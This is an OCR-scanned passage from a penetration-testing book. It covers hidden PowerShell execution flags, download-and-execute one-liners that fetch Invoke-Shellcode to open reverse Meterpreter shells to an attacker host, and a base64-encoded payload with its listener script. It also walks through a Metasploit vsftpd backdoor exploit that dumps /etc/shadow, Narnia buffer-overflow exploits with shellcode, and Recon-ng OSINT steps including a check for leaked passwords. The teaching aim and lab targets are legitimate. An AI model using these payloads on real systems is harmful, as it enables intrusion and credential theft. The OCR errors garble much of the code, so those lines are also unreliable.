e -noexit Do not exit shell after execution. This is important for scripts like 

keyloggers, so that they continually run. 

e -W Hidden: Sets the window style for the session. This is so that the command 

prompt stays hidden. 

e 32-bit or 64-bit PowerShell: 
о This is also very important. Some scripts are only meant to run on 
their specified platform. So if you are on a 64bit box, you might need to 
execute 64-bit PowerShell to run the command. 


о 32-bit PowerShell Execution: powershell.exe -NoP -Noni -W 
Hidden -Exec Bypass 

о 64-bit PowerShell Execution: 
% WinDir%\syswow 64\windowspowershell\v1.0\powershell.exe - 
МОР -Nonl -W Hidden -Exec Bypass 


To help you better understand what we will come across in the PowerShell adventures, here are some 
of the common execution commands that will be used throughout this book: 


The first command will download a PowerShell script from a web server and execute that script. In 
many cases, we are going to download a Meterpreter PowerShell script on a victim target via a 
command prompt: 
e Powershell.exe -NoP -Nonl -W Hidden -Exec Bypass IEX (New-Object 
Net. WebClient).DownloadString('| PowerShell URL]; [Parameters] 


For example, if we want to execute a Meterpreter Shell on a target, we need to download this script: 
e https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke 
-Shellcode.ps1 


We also need to know which parameters to use. The easiest way to find out what parameters you 
might need is to read the source code of the PowerShell Script. Go visit the Invoke--Shellcode.ps1 
file. If we look at the Invoke--Shellcode.ps1 file written by Mattifestation, we can see an example of 
how to call a reverse-https Meterpreter shell. 


гаа uburercondent.com 


Е Invoke-Shel leode -Payload windcws/meterpreter/rev htt Lhost 192.168.30.129 -Lpart EJ 


Description 
mmmmmmmm mmm 


Establishes a reverse http mererprerer payload from within the running PeerShell procesg. A mulri-hanc 





Invoke--Shellcode.ps 1 


Our final PowerShell command will look like this: 
e Powershell.exe -NoP -Nonl -W Hidden -Exec Bypass IEX (New-Object 
Net. WebClient). DownloadString(‘https://raw.githubusercontent.com/cheetz/PowerSplc 
-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse https - 
Lhost 192.168.30.129 -Lport 80 


This makes PowerShell extremely easy and powerful to use. Let’s look at a few more examples. 


Let’s say you downloaded the same file onto the target. You don’t want to have to reach out to a web 
page to automatically download and execute the file. To locally run it: 


ө powershell.exe -NoP -Nonl -W Hidden -Exec Bypass -Command "& {Import- 
Module [Path and File of PowerShell Script]; [Parameters]}" 


Lastly, throughout this book, I will regularly use base64 encoded PowerShell scripts both for 
obfuscation and for compacting my code. To run an encoded PowerShell Script: 


e powershell.exe -NoP -Nonl -W Hidden -Exec Bypass -enc [Base64 Code] 


Hopefully, this makes using PowerShell pretty straightforward and usable in your own tests. 


Easy-P 


Because this book is so heavily invested in PowerShell attacks, I created a little script to make 
PowerShell a little more accessible during a penetration test. Easy-P has some of the common 
PowerShell tools I use and the ability to encode my scripts. 


For every command, Easy-P will give you multiple ways to run the code both locally and remotely. 
Note that all the remote PowerShell scripts are linked to either my code or to forked versions of other 
people's codes. I want to mention something here, which will be mentioned a couple more times 
throughout the book: Remember to fork your own copies off of the original sources, so that you don't 
blindly run someone else's code. You never know if someone is going to maliciously change the 
PowerShell script randomly and now, either nothing works or even worse, your shells are going 
somewhere else. Let's dive into Easy-P to make your life much simpler. 


e cd /opt/Easy-P 
e python ./easy-p.py 


: /opt/Easy-P# python . /еаѕу р. ру 


/ МЕЕ = =й 
\/ M VM 
PowerShell/WMI Generator 


--Easy-P Menu Systeme= 

l.Privilege Escalation 

2,Lateral Movement 

3.Keylogging 

4.PowerShell Meterpreter 

5.Change Users Execution Policy 
6.Powershell 101 

7.Base64 Encode a PowerShell Script 
8.Exit/Quit 


Nhat would you Like to do: 


THP Easy-P 


One of the most common things I will do in this book is use PowerShell Meterpreter Scripts. Once 
you execute the Easy-P script, select option 4. You will be presented with setting your localhost IP 
and the port on which you want the Meterpreter script to connect back. Once that is done, you will 
have an output similar to the following: 





What would you like to do: 4 


[*]PowerShell Metasploit Meterpreter Reverse HTTPS Shell 

LHOST: 192.168.1.100 

LPORT: 4444 

[*]Download from internet and execute: 

Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).[ 
w.github.com/mattifestation/PowerSploilt/master/CodeExecution/Invoke-Shellcode.ps 
load windows/meterpreter/reverse https -Lhost 192.168.1.100 -Lport 4444 -Force 


[*]Run from a local copy of the script: 
powershell.exe -exec bypass -Command "& {Import-Module .XInvoke-Shellcode.psl; I 
indows/meterpreter/reverse https -Lhost 192.168.1.100 -Lport 4444 -Force)" 


[*]Base64 encoded version download and execute: 

powershell.exe -NoP -NonI -W Hidden -Exec Bypass -епс SQBFAFgAIAAoAE4AZQBSACOATWE 
AFCAZQBiAEMAbABpAGUAbgBOACKkAL qBEAGBAdwBuAGWwAbwBhAGQAUWBOAHIAaQBuAGCAKAAnAGgAdABO! 
CAaQBOAGgAdQBiACA4AYwBv AGOALWwBtAGEAdABOAGK AZgBLlAHMAdABhAHQAaQBvAGAALwBÜAGBAdwBTlAH 
cwBOAGUAcqAvAEMAbwBk AGUARQB4AGUA YwB1AHQAaQBy AGAALwBJAGAAdgBvAGSAZQAtAFMAaABTAGWAE 
ApADSAIABJAG4AdgBvAGSAZQATtAFMAaABLlAGWAbAB] AGSAZABLACAALQBQAGEAeQBSAGBA YOBKk ACAAdwE 
AGUAcgBwAHIAZQBOAGUAcgAvAHIAZQB2AGUAc gBzAGUAXWBOAHQAdABWAHMATAAtAEWAaAB v AHMAdAA q/ 
AAMQAWADAAIAAtAEwACABVAHIAdAAgADQANAAOADQAIAATtAEYAbwBy AGHMAZQA- 


[*]Listner Resource Script (listener.rc) - Save the following to a file called 1: 


х and load your handler with msfconsole -r Listener.rc 
use multi/handler 

set payload windows/meterpreter/reverse_https 

set LHOST 192.168.1.100 

set LPORT 4444 


Example Easy-P Output 


You will get four different outputs: 
e Download from the Internet and execute: Download a PowerShell script from a 
website then execute that script. This is great when you only have a simple shell and 
do not have the ability to download files. 
e Run froma local copy of the script: If you have already pushed a PowerShell file to 
the system, it will output a command to import that PowerShell script and execute it. 
e Base64 encoded version of download and execute: If for some reason you want to 
obfuscate your encoded scripts or you run into character limitations, this will base64 
your code and give you the execution command. 
e Resource File: Lastly, you will be given the associated Resource File. A 
Metasploit resource file is a quick way to automatically set up a handler for the 
Meterpreter PowerShell script. Copy that resource script and save it to a file: 
/opt/listener.rc. 





All of the scripts are already configured to bypass execution policy, stay hidden, and run non- 
interactive. Take a look at all of the other menu choices in Easy-P, as it also has modules on Privilege 
Escalation, Lateral Movement, Keylogging, PowerShell Meterpreter, and Change Users Execution 
Policy. Feel free to fork my code and modify it to add all the PowerShell code you need. 


Learning 


This book is really geared toward those who have, at a minimum, some understanding of tools like 
Nmap, Metasploit, Cain and Abel, aircrack and others. You should also have a high level of 
understanding of attacks like buffer overflows and high-level languages like Python/Ruby. 


If you need a quick refresher or need to do some testing, here is a little starter pack for you: 


Metasploitable 2 


One comment I received was that there were no beginner walk-throughs on how to use Metasploit or 
fully test exploits using some of Metasploit’s features. This is where Metasploit 2 comes in as a great 
test bed. Before we get started, we need to download the VMWare Image for Metasploitable 2. 


Download: 
http://sourceforge.net/projects/metasploitable/files/Metasploitable2/ 


Once you download Metasploitable 2, unzip it, and open it in VMware Player or Virtual Box, login 
with the user account msfadmin and password msfadmin. Now, you have your vulnerable VM image 
running. 


LAB 

Practice running Nmap, Masscan, or vulnerability tools against the vulnerable virtual machine. Once 
you find the system vulnerable to an exploit, let’s get a shell on it. In our example, we found and are 
going to take advantage of a flaw in vsftpd. So we can either do a search for the exploit (search 
vsftpd) or we can go straight into the exploit. 


e msfconsole 

e use exploit/unix/ftp/vsftpd_ 234 backdoor (selects the exploit) 
e show options (shows all the configuration options) 

e set RHOST [IP] (sets the Metasploitable 2 IP) 

e exploit (runs the exploit) 


sf > use exploit/unix/ftp/vsftpd 234 backdoor 
sf exploit ( ) » show options 


Module options (exploit/unix/ftp/vsftpd-234 backdoor): 
Name Current Setting Required Description 
The target address 


The target port 


Exploit target: 


Id Name 


0 Automatic 


f exploit( ) » set RHOST 172.16.151.145 
-» 172.16.151.145 
f exploit( ) » exploit 


Banner: 220 (vsFTPd 2.3.4) 

USER: 331 Please specify the "password. 

Backdoor service has been) ѕраипеє, fanāling. 3. 

UID: uid-0(root) gid=0( ropt) 

Found shell. 

Command shell ses 2 -> 
2015-02-22 00:00:3 


shadow 
/avpfBJ SUF9Iv./DR9ESLid. :14747:0:99999:7::: 
daemon: *:1468 : 
bin:*:14684:0 ): 
sys: $1$fUX6BPOt$Miyc 3Up0ZQJqz4s5wFD910 :14742:0:99999:7::: 
Metasploit Example 





We were successfully able to exploit this vulnerability and read the stored passwords with: cat 
/etc/shadow. To further dig into Méetasploitable 2, check out the  Rapid7 guide: 


There are a ton of different vulnerabilities on this virtual machine. Make sure you spend time learning 
how to effectively use Metasploit and Meterpreter. If you are looking to get deeper into Metasploit, I 
recommend: 


Binary Exploitation 


Just like in the first edition of The Hacker Playbook, this book does not go deeply into binary 
exploitation, because this is a whole other topic that requires something like The Shellcoders 
Handbook ( ) or Hacking: The Art of Exploitation, 2nd Edition 
( ). However, this doesn't mean that you shouldn't have an understanding of 
buffer overflows and basic exploitation. Since all penetration testers should be able to “script” code, 
they should also be able to read other exploitation code. You might find a module in Metasploit that 
does not work and needs minor modifications or verification of what it does before you download an 
exploit from the Internet. 


There are a ton of different sites you can start with to get the basics down on binary exploitation. A 
great place to learn is on a site called Over the Wire (http://overthewire.org/wargames/narnia/). 
Over the Wire is an online CTF-style challenge that focuses on all aspects of hacking from binary to 
web. In this chapter, we are only going focus on binary exploitation. If you have never done anything 
like this before, I would take a couple of weekends to hammer away at this site. To get you started, I 
will walk you through the first couple of challenges—however, it is up to you to continue down the 
path. 


Before you begin, study up a bit on: 
e Basic assembly and understanding registers 
e The basics on GDB (GNU Debugger) 
e Understand the different memory segments (the stack, heap, data, BSS, and code 


segments) 
e Shellcode basics 


Some resources that might help you start: 


e http://opensecuritytraining.info/Intro X86.html 

e http://www.reddit.convr/hacking/comments/1wy610/exploit tutorial buffer overflo 
e https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part- 1- 
stack-based-overflows/ 

e http://www.lethalsecurity.com/wiki 

e http://opensecuritytraining.info/ Exploits] .html 

e https://exploit-exercises.com/protostar/ 


Narnia Setup 
(http://overthewire.org/wargames/narnia/) 


Stage 1 
Narnia is configured so that you SSH into their servers and all challenges are located under /narnia/. 
Let's walk through the first three examples. From a terminal prompt on Kali or using something like 


Putty (http://www.chiark.greenend.org.uk/-sgtatham/putty/download.html) on Windows: 


e ssh narna0@narnia.labs.overthewire.org 
e Password: narnia0 
e cd /narnia/ 


Each challenge is laid out in a manner that shows you both the C code and the binary executable. For 
challenge 0, we have both a narniaO and narnia0.c file. Let's take a look at the raw C code: 
e cat narnia0.c 


„®©ө © © г admin — narnia0Gmelinda: /narnia — ssh — 125x« 


| narnia@@melinda:/narnia$ cat narnia0.c 
/* 





This program is free software; you can redistribute it and/or modify 
it under the terms of the GNU General Public License as published by 
the Free Software Foundation; either version 2 of the License, or 
(at your option) any later version. 
This program is distributed in the hope that it will be useful, 
but WITHOUT ANY WARRANTY; without even the implied warranty of 
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. бее the 
GNU General Public License for more details. 
You should have received a copy of the GNU General Public License 
along with this program; if not, write to the Free Software 
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 62110-1301 USA 
x/ 
#include <stdio.h> 
#include <stdlib.h> 
int main(){ 
long val-0x41414141; 
char bufí20]; 
printf("Correct val's value from 0x41414141 -> @xdeadbeef!\n"); 
printf("Here is your chance: "); 
scanf ("%24s", &buf) ; 


printf("buf: %s\n",buf); 

printf("val: 0x*08xXn" , val); 

if (val==@xdeadbeef ) 
system("/bin/sh"); 

else { 
printf ("WAY OFF!!! !\n"); 
exit(1); 

} 


return 9; 


Narnia 0 - Code 


After taking a quick look at the code, we see the variable “val” is assigned to the hex value of 
“AAAA”. Next, we see that it takes an input with buffer length of 20 bytes. A few lines later, we see 
that scanf) expects 24 bytes maximum. This 15 your very simple buffer overflow type example. Now, 
let's run the executable, and, as a test, supply it 20 A's and 4 B's (because we know the hex value of 
A = 41 and B = 42). So at the command prompt, it should look something like this: 


e narnia0@melinda:/narnia$ ./narnia0 

€ Correct val's value from 0x41414141 -> Oxdeadbeef! 

e Here is your chance: AAAAAAAAAAAAAAAAAAAABBBB 
e buf AAAAAAAAAAAAAAAAAAAABBBB 

e val: 0x42424242 

e WAY OFF!!! 


Great! Since the HEX value at “val” 1s 0x42424242 (42 translates to ASCII letter B), we know that 
we are able to overwrite the value of “val” in memory, which was previously 0x41414141. All we 
have to do now is overwrite this value in memory with Oxdeadbeef. The thing to remember is that 
everything must be written фо the stack in Little Endian format 
(http://en.wikipedia.org/wiki/Endianness), meaning the last byte in Oxdeadbeef must be the first byte 
pushed to the stack to overwrite the value of “val”. This is due to the First-In, Last-Out (FILO), or 
Last-In, First-Out (LIFO) architecture of the target machine's stack. So, to supply our Oxdeadbeef 
value, we will have to write it as “\xef\xbe\xad\xde”. The easiest way to only supply HEX values and 


execute our A’s is using python and piping it into our narnia0 example. Let's see this in action: 


e narnia0(a)melinda:/narnia$ python -c 'print "A"*20 + "\xef\xbe\xad\xde" | ./narniaO 
€ Correct val's value from 0x41414141 -> Oxdeadbeef! 

e Here is your chance: buf: AAAAAAAAAAAAAAAAAAAA 1? 
e val: Oxdeadbeef 














Great x2! We now have written deadbeef in our “val” variable. How can we run shell commands? If 
we go back to our C code, we see that if we match deadbeef, /bin/sh gets called. So let's take our 
python code and try to read the key located at /etc/narnia pass/narnial: 

e narnia0@melinda:/narnia$ (python -c 'print "A"*20 + "\xef\xbe\xad\xde"; echo 'cat 

/etc/narnia pass/narnial') | /narnia/narniaO 

e Correct “val's” value from 0x41414141 -> Oxdeadbeef! 

e Here is your chance: buf: AAAAAAAAAAAAAAAAAAAA 1? 

e val: Oxdeadbeef 

e [ Answer to Stage 1] 

















пагпіадёте1іпда: /пагпіа$ (python -c 'print "A"x20 + "\xef\xbe\xad\xde"'; 
echo 'cat /etc/narnia pass/narnial') | /narnia/narniad 
Correct val's value from 0x41414141 -> Oxdeadbeef! 
Неге is your chance: buf: AAAAAAAAAAAAAAAAAAAAA ? 
val: @xdeadbeef 
efeidiedae 
Narnia 0 — Exploit 


If you were successful, you have defeated stage 1 and earned the password to the narnial account. We 
need to log out and log into the newly gathered account. 


Stage 2 
After you finish each stage, you get the password to the next account. Let's log into stage 2 using the 
narnial account we just obtained. 


Log into stage 2: 
e ssh narnia l @narnia.labs.overthewire.org 
e Password: [Password From Narnia 1] 
e cd /narnia/ 
e cat narnial.c 


int main(){ 
int (xret)(); 


if(getenv("EGG")==NULL) { 
printf("Give me something to execute at the env-variable EGG\n"); 
exit(1); 

} 


printf("Trying to execute EGG!\n"); 
ret = getenv("EGG"); 
ret(); 
Narnia 1 - Code 


Reading the C code, we see a couple of things immediately: 


e int (*ret)(); - is a pointer to ret to get it's value 
e getenv - takes in an environment variable EGG and stores it to the variable ret 
e Calls ret() 


If we can store shellcode into the environment variable EGG, then whatever shellcode 1s stored there 
will be executed. The easy way to do this is to take the shellcode for /bin/sh and set it to an 
environment variable EGG. 


e We will use the shellcode for /bin/sh from this example: 
http://shell-storm.org/shellcode/files/shellcode-81 1.ph 


ө export EGG- python -C 'print 
"\x3 1\xcO\x50\x68\x2f\x2 f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc 1\x89\xc2\xb0\x 
e /narnial 


e cat /etc/narnia pass/narnia2 


narnial@melinda: /narnia 


File Edit View Search Terminal Help 

баң сорри окы, /narnia$ варот EGG="python -c'print 
BXx2fx62Xx69x6exBOXxea3NxB9Nxc 1NxB9Vxc2N xb xOb\ xcd\ 
harnteianetinda: PA BE л: 


Trying to execute EGG! 
$ GM. /etc/narnia _pass/ ‘narnia? 


3H 





Narnia 1 - Exploit 


We now have the password to the narnia2 account and can move on to stage 3. 


Stage 3 
For stage 3: 
e ssh narnia2@narnia.labs.overthewire.org 
e Password: [Password from Narnia 2] 
e cd /пагта/ 
e cat narnia2.c 
Looking at the C code, we see the following: 
e char buf] 128]; 
ө if(argc == 1)! 
e printf(" Usage: Vos argument", argv[0]); 
e exit(1); 
• } 
e strcpy(buf;argv[1]); 
e printf(" os", buf); 


By looking at the code, we see that it takes an argument and copies it into buf. We see that there 1s a 
char buf of 128 bytes, so let's start by sending 200 characters: 

e narnia2@melinda:/narnia$ ./narnia2 ‘python -c 'print "A" * 200" 

e Segmentation fault 


We just verified that sending 200 characters causes the application to have a segmentation fault. We 
need to identify how many bytes before we overwrite EIP. We can do this with a Metasploit module 
called pattern create.rb. This module creates a unique string and in our example below, we will 
create a string of 200 bytes. Since this string never repeats, we can identify exactly where our 
program overflows EIP. 


e /usr/share/metasploit-framework/tools/pattern create.rb 200 
e Aa0AalAa2Aa3Aa4Aa5Aa26Aa7Aa8Aa9 AbOAb] Ab2Ab3AbAAbSAbGAb7ADbSAbSC 


Now, let's run our new custom unique string through narnia2 to see how many bytes it takes before 
we cause a segmentation fault. To see the exact results of our segmentation fault, we will have to use 
a debugger. By default, Linux systems have a debugger called gdb. Although it isn't the easiest 
debugger to use, it is extremely powerful: 


e gdb ./narnia2 -q 
ө гип "python -C 'print 
"Aa0AalAa2Aa3Aa4Aa5 Aa6Aa7 Aa8Aa9 AbOAbTIAb2ADb3AbAAbSAb6Ab7AbSADbO; 


The result of the query is: 





arnia2@melinda:/narniaS gdb ./narnia2 -q 

eading symbols from ./narnia2...(no debugging symbols found)...done. 
(gdb) run ‘python -c ‘print "Aa0^a1Aa2Aa3^a4Aa5Aa6Aa7^28Aa9Ab0Ab1Ab2Ab3 
Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7AeBAe9AfOAf1AT2AT3Af4ATSATGATTAfSATOAqg0AG1Aq 
tarting program: /games/narnia/narnia2 ‘python -c 'print "Aa@AalAa2Aa3 
Ac9AdOAd1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7AeBAe9Af OAT IAF 


rogram received signal SIGSEGV, Segmentation fault, 





x37654136 in ?? () 


Narnia 2 — Exploit 


e Program received signal SIGSEGV, Segmentation fault. 


© 0x37654136 in 2? () 


The output from our command is 0x37634136. We need to look in our original string to find that exact 
value. To find the exact number of bytes where the segment fault was caused, we can use Metasploit’s 


pattern offset.rb: 


e /usr/share/metasploit-framework/tools/pattern offset.rb 0x37654136 
e | *] Exact match at offset 140 


This shows that after 140 characters, we can control EIP. To verify this, we can run narnia2 with an 
input of 140 bytes and we should be able to overwrite EIP with an extra 4 bytes. We are going to use 


a debugger to watch it happen in memory. 


The output should look like the following: 


e cd /narnia 
e gdb ./narnia2 -q 


e (gdb) run ‘python -c 'print "A" * 140 + "B" * 4" 
o Starting program: /games/narnia/narnia2 "python -c 'print "A" * 140 


4 "p" * 4" 


о Program received signal SIGSEGV, Segmentation fault. 
о 0x42424242 1n ?? () 


e (gdb) info registers 
о eax 
оесх 
o edx 
o ebx 
о esp 
o ebp 
о esi 
o edi 
оер 


0x0 0 

0x0 0 

Oxf7fcb898 -134432616 
Oxf7fca000 -134438912 
Oxffffd640 — Oxffffd640 
0x41414141 0x41414141 
0x0 0 

0x0 0 

0x42424242  0x42424242 


We were able to overwrite EIP with all *B" (or hex equivalent 0x42) characters, which is the pointer 
to the code that will be executed next by the processor. If we can point EIP to an area of shellcode, 


we can compromise the system. Where might you find shellcode? You can always generate your own 
or you can grab shellcode from here: 


http://shell-storm.org/shellcode/. 


In this example, we are going to use Linux/x86 - execve(/bin/sh) - 28 bytes. We know our shellcode 
is 28 bytes and our payload needs to be 144 bytes in length. I also want to change my A’s to NOPs or 
x90, which means if we land on a NOP, it will continue until we hit executable code. After playing 
around a little with the space, I created the following: 
e cd /narnia 
e gdb ./narnia2 -q 
ө run "python -C 'print "x90" Ы 50 ат 
"x3 1\xc0\x50\x68\x2fix2fix73\x68\x68\x2fix62\x69\x6e\x89\xe3\x50\x53\x89\xe 1\хЫ0\х 
+ "\x90" * 67 + "BBBB"" 
o Starting program: /games/narnia/narnia2 ‘python -c 'print "\x90" * 50 
+ 
"\x3 1\xcO\x50\x68\x2 f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xS0\x5. 
+ "\x90" * 67 + "BBBB"" 
o Program received signal SIGSEGV, Segmentation fault. 
о 0x42424242 in ?? () 
e (gdb) info registers eip 
оер 0x42424242 0х42424242 


We successfully have control of EIP with our shellcode and NOPs. Now, we need to just drop in 
anywhere before our NOPs and we should have a /bin/sh shell. To see what is stored in the memory, 
after we seg fault, type: 

e x/250x $еѕр 


Scrolling through, you should see something like the following: 


| Oexffffd780: 0x00000004 0x00000020 0x00000005 0x00000008 
Oxffffd790: 0x00000007 Oxf7fdcoo0 0x00000008 0x00000000 
| Oxffffd7ae: 0x00000009 0x08048360 0x0000000b 0x000036b2 
| Oxffffd7b0: 0x0000000c 0x000036b2 @x0000000d 0x000036b2 
l'exffffd7c0: 0x0000000e 0x000036b2 0x00000017 0x00000000 
| Oxffffd7d0: 0x00000019 Oxffffd7fb 0x0000001f Oxffffdfe2 
Oxffffd7e0: 0xe000000f Oxffffd80b @x00000000 0x00000000 
Oxffffd7f0: 0x00000000 6x00000000 0x4a000000 0x4a448600 
Oxffffd800: Ox1b1f07ce @x2b6dbf8d 0x698c040a 0x00363836 
| Oxffffd810: 0x672f0000 0x73656d61 0x72616e2f 0x2f61696e 
Oxffffd820: 0x6e72616e 0x00326169 0x90909090 0x90909090 
Oxffffd830: 0x90909090 0x90909090 0x90909090 0x90909090 
Oxffffd840: 0x90909090 0x90909090 0x90909090 0x90909090 
Oxffffd850: 0x90909090 0x90909090 0xc0319090 0x2f2f6850 
Oxffffd860: 0x2f686873 0x896e6962 0x895350e3 OxcdObb0e1 
Oxffffd870: 0x90909080 0x90909090 0x90909090 0x90909090 
Oxffffd880: 0x90909090 0x90909090 09x90909090 0x90909090 
Oxffffd890: 0x90909090 0x90909090 0x90909090 0x90909090 
Oxffffd8a0: 0x90909090 0x90909090 0x90909090 0x90909090 
Oxffffd8b0: 0x90909090 0x42424242 0x47445800 0x5345535f 
---Type «return» to continue, ог q «return» to quit-—-- 
Oxffffd8cO: 0x4e4f4953 0x3d44495f 0x36343832 0x48530034 
Oxffffd8d0: 0x3d4c4c45 0x6e69622f 0x7361622f 0x45540068 
Oxffffd8e0: 0x783d4d52 0x6d726574 0x3635322d 0x6f6c6f63 
| Oxffffd8f0: 0x53530072 0x4c435f48 0x544e4549 0x2e30373d 





NOP Sled 


We see our initial NOPs (x90), followed by our shellcode, more NOPs, and lastly, our BBBB. We 
need to change our BBBB to an address in our NOP Sled to execute our shellcode. An easy address is 
Oxffffd850—a stack address which points to our first set of NOPs. Let's give it a try and don't forget 
Little Endian. 


ө (gdb) run "python -C 'print "x90" * 50 F 
"x3 1\xc0\x50\x68\x2fix2fix73\x68\x68\x2fix62\x69\x6e\x89\xe3\x50\x53\x89\xe 1 \xb0\y 
+ "\х90" * 67 + "\x50\xd8\xffixff" 
o Starting program: /games/narnia/narnia2 ‘python -c 'print "\x90" * 50 
+ 
"\x3 1\xcO\x50\x68\x2 f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xS0\x5. 
+ "\x90" * 67 + "\x50\xd8\xffixff" 
© process 5823 15 executing new program: /bin/dash 
ө $ cat /etc/narnia_pass/narnia3 
о cat: /etc/narma_pass/narnia3: Permission denied 


We were able to get our shellcode to execute and get our shellcode to run, but for some reason we 
couldn’t read the narnia3 password. Let’s try this outside of GDB: 
e narnia2@melinda:/narnia$ ./narnia2 ‘python -c ‘print "x90" * 50 + 
"x3 1\xcO\xS0\x68\x2f\x2f1x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe 1 \xb0\x 
+ "\x90" * 67 + "\x50\xd8\xffixff"” 
e $ cat /etc/narnia pass/narnia3 
o [Answer to Narnia3 Here] 


ANOA ATANA KA ern re M od PN qid 


x90" x 67 + "Ax5OXxdBAxffAXTT" 
$ cat /etc/narnia pass/narnia3 





Narnia 2 — Exploit 


And there it works! We now have a privileged shell and can read the password for narnia3. 
Hopefully, this gives you an initial insight into how buffer overflows work and why they work. 
Remember that this was a quick 1000-foot view of binary exploitation. It is now up to you to spend 
some time trying some of the other examples. 


Summary 


What this chapter has tried to do is to help you build a standard platform for testing, make sure you 
have a strong foundation of PowerShell, and give you an understanding of the basics of binary 


exploitation. 


Tools will always change, so it is important to keep your testing platforms up-to-date and patched. I 
have included all the tools that are used in this book and, hopefully, this information will be enough to 
get you started. If you feel that I am missing any critical tools, feel free to leave comments at: 


http://www .thehackerplaybook.com. 


Take a full clean snapshot of your working VMs and let's start discovering and attacking networks. 


Before The Snap - Scanning The Network 


The game has started and you walk onto the SUCK, Inc. field. Before the first kickoff, and before we 
even attack our unsuspecting victim, we need to analyze our opponent. Studying the target for 
weaknesses and understanding the environment will provide huge payoffs. This chapter will take a 
look at scanning from a slightly different aspect than the normal penetration testing books and should 
be seen as an additive to your current scanning processes, not as a replacement. 

Whether you are a seasoned penetration tester or just starting in the game, scanning has probably been 
discussed over and over again. I am not going to compare in detail all the different network scanners, 
vulnerability scanners, SNMP scanners and so on, but I will try to give you my most efficient process 
for scanning. This section will be broken down into Open Source Intelligence, External Scanning, 
Internal Scanning, and Web Application Scanning. 


Passive Discovery - Open Source Intelligence (OSINT) 


Trained in Open Source Intelligence, you use your knowledge of where information exists on the 
Internet to find as much information about SUCK as we can. We want to become one with these Cyber 
Kittens, find their secrets, understand their verbiage, and find their employees. 


Before you ever even start performing any OSINT tests, it is best if you create fake social media 
accounts. Some examples of these might be (the more you have the better): 

e LinkedIn 

e Twitter 

e Google+ 

e Facebook 

e [nstagram 

e MySpace 

e Glassdoor 


You don't want to use your own personal accounts as many of the sites show who visited your pages. 
This could be a quick way to get identified and potentially kill your whole mission. Now that we are 
ready with the OSINT setup, let's start gathering data. 


We will start with Passive Discovery, which will search for information about the target, network, 
clients, and more without ever touching the targeted host. This 1s great because it uses resources on 
the Internet without ever alerting the target of any suspicious activity. You can also run all these 
lookups prior to an engagement to save you an immense amount of time. Let's start reviewing some 
sources and tools for OSINT. 


Recon-NG 


(https: //bitbucket.org/LaNMaSteR53/recon-ng)(Kali Linux) 


Recon-NG is a great tool for querying Open Source Intelligence (OSINT) for passive information 
about a company. This should be one of the first places you start before you pentest any organization. 
It can give you a lot of information about IP space, naming conventions, locations, users, email 
addresses, possible password leaks, and more. 


rue CUIL view әеа сп тегтипа пер 


Consulting | Research | Development | Training 


http://www.blackhillsinfosec.com 


[recon-ng] [default] » workspaces add SUCK 
[recon-ng][Reddit] » add domains suck.testlab 
[recon-ng][Reddit] » add companies 
company (TEXT): SUCK Company 
description (TEXT): Recon! 
[recon-ng] [Reddit] > use recon/domains-hosts/bing domain web 
[recon-ng][Reddit][bing domain web] > run 
Recon-ng 





Prerequisites 
There are some modules like Linked-In or Jigsaw that provide great value, but you do need to get API 


keys for those. I will walk you through one API key example, which is free and easy to use. 


To use the ipinfodb database to find the exact location of all the IPs you identify, you need to get an 
API key. Go to: http://ipinfodb.com/register.php and register for a key. We will add the key to our 
local store database during our next example. 


To run Recon-Ng 
e cd /opt/recon-ng 


e /recon-ng 
e workspaces add [Company Name - example SUCK Company] 
e add domains [DOMAIN - example suck.testlab] 
e add companies 
e use recon/domains-hosts/bing domain web 
o Look through Bing for domain names 
e run 
e use recon/domains-hosts/google site web 
o Look through Google for domain names 


ө run 
e use recon/domains-hosts/baidu site 
o Look through Baidu (Chinese Search Engine) for domain names 
e run 
e use recon/domains-hosts/brute hosts 
o Brute-force subdomains 
e run 
e use recon/domains-hosts/netcraft 
o Look at netcraft for domain names 
e run 
e use recon/hosts-hosts/resolve 
o Resolve all the domain names to IP 
e run 
e use recon/hosts-hosts/reverse resolve 
o Resolve all the IPs to hostnames/domain names 
e run 
e use discovery/info disclosure/interesting files 
o Look for a few files on the identified domains 
e run 
e keys add ipinfodb api [KEY | 
o This is where you add your infodb API key from earlier 
e use recon/hosts-hosts/ipinfodb 
o Find the location of the IPs that were discovered 
e run 
e use recon/domains-contacts/whois pocs 
o Find email addresses from the whois lookup 
e run 
e use recon/domains-contacts/pgp search 
o Look through the public PGP store for email addresses 
e run 
e use recon/contacts-credentials/hibp paste 
o This will check all of the email accounts you have gathered against 
the *Have I Been PWN'ed" website. This will let you know 1f there 
are potentially leaked passwords that you might be able to use. 
e run 
e use reporting/html 
о Create a report 
e set CREATOR HP2 
e set CUSTOMER HP2 
e run 
e exit 
e firefox /root/.recon-ng/workspaces/SUCK Company/results.html 


This will create a report of all the findings in one single web page. Let’s take a look at what type of 


valuable data has been gathered: 


f&e-/Iroot/.recon-ng/workspaces/SUCK.. Company/results.htmi 
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HP2 


Recon-ng Reconnaissance Report 


[:] Summary 


[-] Hosts 





[-] Contacts 


fest: name middie name — last name 





Man 








Recon-ng Report 


From the results above, we can see that we have been able to quickly identify a ton of different 
hostnames, IPs, locations, email addresses, and more. This is a great start for getting some 


reconnaissance on our victim. Let's keep gathering data! 


Discover Scripts 
(https://github.com/leebaird/discover) (Kali Linux) 


Discover scripts by Lee Baird is still one of my favorite passive discovery tools because of the ease 
of use and the amount of data gathered. Using a passive recon scan, Discover will use tools such as: 
dnsrecon, goofile, goog-mail, goohost, theharvester, metasploit, urlcrazy, whois, dnssy, ewhois, 
myipneighbors, and urlvoid. Discover is updated often and is a great tool for performing OSINT. 


By Lee Baird 


RECON 

1. Domain 

2. Person 

3 Parse salesforce 


NNING 

Generate target list 
CIDR 

List 

IP, Range or URL 


МІ \ 

11. Crack WiFi 

